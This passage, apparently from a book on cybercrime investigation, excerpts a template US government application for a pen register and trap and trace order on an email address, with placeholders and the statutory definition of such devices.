Cover art courtesy of Greg Kipper.
[…] Section [ ], to wit, [statutory description of offense]. It is believed
the subject(s) of the investigation may be using the electronic mail
address [JDoe@isp.com], in furtherance of the specified offense,
and that the information likely to be obtained from the pen/trap
device is relevant to the ongoing criminal investigation. [Although
not required by law, CCIPS recommends the inclusion within
the application of specific and articulable facts that support
this conclusion.]
3. A trap and trace device, as defined in Title 18, United States Code,
Section 3127, is “a device which captures the incoming electronic or
other impulses which identify the originating number of an instrument
or device from which a wire or electronic communication was
transmitted.” A pen register collects destination information for elec-
tronic transmissions. In the traditional telephone context, a pen
register and trap and trace device collects origin and destination
information such as the telephone numbers dialed for a telephone
call.